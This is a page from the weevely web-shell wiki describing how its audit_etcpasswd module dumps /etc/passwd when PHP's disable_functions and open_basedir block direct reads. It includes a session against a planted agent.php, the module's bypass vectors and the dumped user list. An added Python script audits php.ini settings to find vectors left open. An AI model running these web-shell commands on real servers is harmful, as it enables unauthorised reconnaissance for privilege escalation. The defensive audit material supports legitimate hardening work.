Get etc passwd content with no read access

epinna edited this page Sep 20, 2014 · 1 revision

Certain PHP configurations prevent the execution of external shell commands (with disable_functions) and prevent escaping the web root folder (with open_basedir). This blocks direct access to system files such as /etc/passwd that would otherwise be useful for gathering information for a privilege escalation attack.

The audit_etcpasswd module prints the contents of /etc/passwd without reading the file directly.

Configuration

  • Example PHP configuration: disable_functions = system, proc_open, popen, passthru, shell_exec, exec, python_eval, perl_system and open_basedir = /var/www/html/
  • Used modules: audit_etcpasswd
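A defender can check whether a given php.ini actually closes every read vector the module offers. The script below is an added example, not part of weevely; it parses disable_functions and open_basedir and reports which of the vectors listed by audit_etcpasswd --help would still reach /etc/passwd. The mapping from vector names to PHP functions is an assumption drawn from the vector names (fread is assumed to need fopen as well), the base64 vector is not modelled because the page does not say which function it wraps, and the php.ini fragment is constructed to mirror the configuration above. Note that open_basedir only constrains filesystem calls; posix_getpwuid looks up account records through the C library, so only disable_functions can block it.

```python
"""Audit a php.ini fragment against the read vectors of weevely's audit_etcpasswd.

Added example, not weevely's own code. Vector-to-function mapping is assumed from
the vector names shown by `audit_etcpasswd --help`.
"""

TARGET = "/etc/passwd"

# Vector name -> PHP functions it needs and whether open_basedir applies to it.
# Only posix_getpwuid is not a filesystem call, so open_basedir does not restrict it.
VECTORS = {
    "posix_getpwuid": {"funcs": ["posix_getpwuid"], "filesystem": False},
    "file": {"funcs": ["file"], "filesystem": True},
    "fread": {"funcs": ["fopen", "fread"], "filesystem": True},  # fopen assumed
    "file_get_contents": {"funcs": ["file_get_contents"], "filesystem": True},
}

# Constructed php.ini fragment mirroring the configuration described on this page.
SAMPLE_INI = """
; constructed sample, not a real server's configuration
disable_functions = system, proc_open, popen, passthru, shell_exec, exec, python_eval, perl_system
open_basedir = /var/www/html/
"""

# Same configuration with posix_getpwuid added to disable_functions.
HARDENED_INI = SAMPLE_INI.replace("perl_system", "perl_system, posix_getpwuid")


def parse_php_ini(text):
    """Parse `key = value` lines into a dict; drops ';' comments and blank lines."""
    settings = {}
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()
        if "=" not in line:
            continue
        key, value = line.split("=", 1)
        settings[key.strip().lower()] = value.strip().strip('"')
    return settings


def disabled_functions(settings):
    """Set of lower-cased names from the comma-separated disable_functions value."""
    raw = settings.get("disable_functions", "")
    return {f.strip().lower() for f in raw.split(",") if f.strip()}


def path_allowed(open_basedir, path):
    """open_basedir semantics: colon-separated path prefixes; unset means unrestricted.
    PHP resolves the real path before comparing; this check skips symlink resolution."""
    if not open_basedir:
        return True
    return any(path.startswith(base) for base in open_basedir.split(":") if base)


def vectors_reaching(ini_text, target=TARGET):
    """Sorted list of vectors that would still reach `target` under this configuration."""
    settings = parse_php_ini(ini_text)
    disabled = disabled_functions(settings)
    basedir = settings.get("open_basedir", "")
    reachable = []
    for name, spec in VECTORS.items():
        if any(f in disabled for f in spec["funcs"]):
            continue  # blocked by disable_functions
        if spec["filesystem"] and not path_allowed(basedir, target):
            continue  # blocked by open_basedir
        reachable.append(name)
    return sorted(reachable)


if __name__ == "__main__":
    for label, ini in (("page configuration", SAMPLE_INI), ("hardened", HARDENED_INI)):
        print(f"{label}: vectors still reaching {TARGET}: {vectors_reaching(ini) or 'none'}")
```

Run against the page's configuration the script reports posix_getpwuid as the only vector left open, which is exactly the gap the session below exercises; with posix_getpwuid added to disable_functions none remain. Disabling the posix_* family is the usual fix when the application does not need it.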

Session

No external shell commands are available here: the only available shell is the PHP interpreter. First, try to access the target file directly.

$ ./weevely.py http://target/agent.php mypassword

[+] weevely 3.0

[+] Target:	target
[+] Session:	_weevely/sessions/target/agent_1.session
[+] Shell:	PHP interpreter

[+] Browse the filesystem or execute commands starts the connection
[+] to the target. Type :help for more information.

www-data@target:/var/www/html PHP> cd /etc
[-][cd] Failed cd '/etc': no such directory or permission denied
www-data@target:/var/www/html PHP> cat /etc/passwd
[-][download] File download failed, please check remote path and permissions

Direct access is not possible. The audit_etcpasswd module can nevertheless enumerate the user entries.

www-data@target:/var/www/html PHP> :audit_etcpasswd --help
usage: audit_etcpasswd [-h] [-real]
                       [-vector {posix_getpwuid,file,fread,file_get_contents,base64}]

Get /etc/passwd with different techniques.

optional arguments:
  -h, --help            show this help message and exit
  -real                 Filter only real users
  -vector {posix_getpwuid,file,fread,file_get_contents,base64}

www-data@target:/var/www/html PHP> :audit_etcpasswd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
yzer:x:1000:1000:yzer,,,:/home/yzer:/bin/bash
www-data@target:/var/www/html PHP>

The content of /etc/passwd has been extracted anyway.